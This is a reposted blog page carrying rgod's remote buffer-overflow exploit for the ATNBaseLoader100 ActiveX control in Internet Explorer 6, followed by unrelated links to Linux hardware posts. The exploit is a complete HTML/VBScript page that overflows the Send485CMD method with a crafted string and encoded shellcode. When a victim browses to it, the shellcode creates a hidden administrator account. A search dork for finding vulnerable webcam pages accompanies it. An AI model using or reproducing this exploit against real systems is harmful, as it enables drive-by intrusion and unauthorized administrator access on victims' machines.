IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module Remote BoF Exploit

最新推荐文章于 2021-11-22 10:21:01 发布
转载 最新推荐文章于 2021-11-22 10:21:01 发布 · 1.8k 阅读 · 0
文章标签:

#module #ie #vbscript #c #object #cmd

本文介绍了一个针对 ATNBaseLoader100.dll 的远程缓冲区溢出漏洞,并提供了一个具体的漏洞利用示例。通过分析该漏洞如何被触发及 EIP 被覆盖的过程,展示了 Send485CMD 方法中存在的问题。 
<!--
IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6)
remote buffer overflow exploit / XP SP2 it version
by rgod
site: retrogod.altervista.org

this activex is installed browsing some webcam pages
try this google dork:

intitle:"Browser Launch Page"
(dork credit: dragg, found in GHDB)

object safety report:

RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False

here it is what happen, EIP is overwritten after 272 chars passed to
Send485CMD method:

EAX 00000001
ECX 0013EA7C ASCII "AAAA ...
EDX 7EFF00E4
EBX 10007414
ESP 0013EB98 ASCII "AAAA ...
EBP 41414141
ESI 0018022C
EDI 00000000
EIP 41414141

SetLoginID, AddSite, SetScreen, SetVideoServer methods are also vulnerable
to less convenient overflows or seh overwrite
-->
<HTML>
<OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT>
<script language='vbscript'>

'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add
SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
NOP= String(12, unescape("%90"))
EIP= unescape("%03%78%41%7e") 'call ESP user32.dll

SunTzu=String(272, "A") + EIP + NOP + SCODE

BaseRunner.Send485CMD SunTzu

</script>
</HTML>
 
iiprogram
关注
机器多网卡禁用部分网卡说明
weixin_45038460的博客
10-25 826
禁用网卡设备
Find PCI hardware details using lspci command in Linux
11-17 403
This is our 4th post on finding hardware details in Linux. Till this point we explored different ways to display complete hardware available in a system. We already explored following posts. Get BI
Linux总线pice错误,PCIe总线错误严重性=已更正
weixin_30582289的博客
05-12 2858
问题描述我有一个新的HP Pavilion游戏笔记本和一个新的Ubuntu 16.04安装。当我按下Ctrl + Alt + F1时,我开始看到下图中显示的错误,它不允许我与控制台交互:我每次启动时都会看到这些错误一段时间。我需要按Ctrl + Alt + F1来访问非图形终端以安装一些Nvidia驱动程序。这是怎么回事?导致该问题的原因似乎是:00:1c.5 PCI桥接器[0604]:Intel...
arch安装完成之后不能使用笔记本自带的无线网卡
weixin_30404405的博客
01-05 941
问题描述如下 我笔记本的wifi网卡识别不了,不知道为什么?? 使用ifconfig -a 只列出了有线网卡以及外接的无线网卡如下 enp4s0f1: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether 38:2c:4a:32:3e:b9 txqueuelen 1000 (Ethernet) ...
ArchLinux 问题集锦
风言风语
11-22 3158
[问题] error while loading shared libraries: libpcap.so.0.8:cannot open shared object file: No such file or directory [解决] issues/98 $ locate libpcap /usr/lib64/libpcap.so <-- was one among many results for me $ cd /usr/lib64/ # go to that directory $ su
contact_id.zip_ADEMCO_contact_contact ID_contact-ID_报警
09-24
标题中的"contact_id.zip_ADEMCO_contact_contact ID_contact-ID_报警"揭示了这个压缩包文件主要涉及的是关于ADEMCO报警系统中与“contact_id”相关的技术内容。ADEMCO是一家知名的安防系统制造商,其产品广泛应用于...
PROTOCOLO_DC-05_Contact_ID.zip_ADEMCO_contact
07-15
A Descrption of ADEMCO PROTOCOL for Alarm Systems.
ADEMCO集成系统技术讲座PPT学习教案.pptx
10-06
这篇PPT的学习教案主要涵盖了ADEMCO集成系统的技术特点和应用,主要集中在视频传输与数字化录像、安全自动化、系统集成化以及ADEMCO的发展策略等方面。 1. 视频传输及录像数字化: ADEMCO集成系统实现了模拟视频的...
ADEMCO集成系统技术讲座PPT教学课件.pptx
10-06
ADEMCO集成系统技术讲座PPT教学课件.pptx
linux 触控板 不识别,linux – 未检测到触控板
weixin_31814585的博客
05-13 911
几天前,我收到了一台LDLC Iris FB2-I5-8-S2笔记本,并在其上安装了Linux(Linux Mint 16 Cinnamon 32bit,内核3.11.0-12-通用).除了TouchPad之外的所有东西都是开箱即用的(甚至是触摸屏).我搜索了很多但没找到任何解决方案.这不是使用Fn F *禁用设备的问题以下是各种命令的输出:的lsusb:Bus 001 Device 002: I...
Linux系统远程重启网卡掉线,Ubuntu 16.04无线网卡RTL8723BE频繁掉线及信号不足解决办法...
weixin_35997503的博客
04-30 1149
最近在新电脑上装了Ubuntu 16.04,结果wifi经常连不上,连上了过段时间就掉线,路由器就在电脑的旁边,而且信号非常的弱。但是Windows系统没有任何问题,所以就在网上找解决办法,也按照网上的方法试了,结果好多方法都是没用的。最后从askubuntu上找到了解决方法,首先要查看本机的无线网卡型号:1 linuxidc@linuxidc:~$ lspci2 00:00.0 Host bri...
linux nuc 吗 支持_请教 Linux 驱动问题 NUC
weixin_30898555的博客
12-24 404
Bear130232018-09-20 09:21:32 +08:00@iwtbauhii firmware-iwlwifi 20161130-3 all Binary firmware for Intel Wireless cardsii firmware-realtek ...
linux下qemu-kvm、virt-manager和virsh建立虚拟机没有声音解决方法
silent_ghost的专栏
10-25 4216
ENV: [root@Fedora32 ~]#uname -r 5.8.16-200.fc32.x86_64 [root@Fedora32 ~]#cat /etc/redhat-release Fedora release 32 (Thirty Two) [root@Fedora32 ~]#rpm -qa|grep kvm qemu-kvm-core-4.2.1-1.fc32.x86_64 libvirt-daemon-kvm-6.1.0-4.fc32.x86_64 qemu-kvm-4.2.1-1.
Gingerbread在debain上的编译问题
weixin_34014555的博客
04-20 103
新的SDK是2.3的编译时出现以下错误: Compiling /home/jacky/android_3.0/SRC/target/src/sd/platform/drivers/comps/tmplatHandle/src/handle.c arm-eabi-gcc: /lib/i686/cmov/libc.so.6: version `GLIBC_2.11' not ...
linux下无线网卡安装debian,Debian/Linux 下无线网卡驱动的安装
weixin_42513296的博客
05-01 521
在命令行键入 lspci , 得到网卡型号「BCM43228」```shellxox@debian-x64:~$ lspci00:00.0 Host bridge: Intel Corporation Haswell-ULT DRAM Controller (rev 0b)00:02.0 VGA compatible controller: Intel Corporation Haswell-UL...
Ubuntu 16.04无线wifi频繁掉线及信号不足解决办法
热门推荐
万米高空的博客
10-12 1万+
从安装上ubuntu16.04有好几个月了,每次都会遇到这样的问题:电脑是双系统的,在window系统下连接到同一个wifi信号强,也不掉线。非常稳定,一切换到ubuntu系统就老掉线,掉线就半天连不上。
ubuntu配置无线网卡
victor888886的专栏
12-03 1634
最近在新电脑上装了Ubuntu 16.04,结果wifi经常连不上,连上了过段时间就掉线,路由器就在电脑的旁边,而且信号非常的弱。但是Windows系统没有任何问题,所以就在网上找解决办法,也按照网上的方法试了,结果好多方法都是没用的。最后从askubuntu上找到了解决方法,首先要查看本机的无线网卡型号:1 linuxidc@linuxidc:~$ lspci 2 00:00.0 Host b
lspci通过系统总线查看硬件设备信息
weixin_34132768的博客
10-20 732
lspci - 列出所有PCI设备 PCI 的科普: PCI(Peripheral Component Interconnect),是一种连接电子计算机主板和外部设备的总线标准。 常见的PCI卡包括网卡、声卡、调制解调器、电视卡和磁盘控制器,还有USB和串口等端口。原本显卡通常也是PCI设备,但很快其带宽已不足以支持显卡的性能。PCI显卡现在仅用在需要额外的外接显示器或主板上没有AGP和PC...
首次安装CentOS的辛酸史
wguishen的博客
11-17 1352
几天前,打算开始学习下Linux,于是就买了一本鸟哥的Linux私房菜来学习,并准备按照书上的来安装,由于以前只是在虚拟机中安装,所以这次打算在实体机上实践一把。不得不说,在真机上安装和在虚拟机中差别还是比较大的,所以如果想印象更深刻一些,就准备一个练习机器安装把。ISO镜像,练习机器都已经准备好了,然而没有光盘,于是上网找答案了,果然ISO可以刻录到U盘,使用软件:UltraISO软碟通。完了之
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值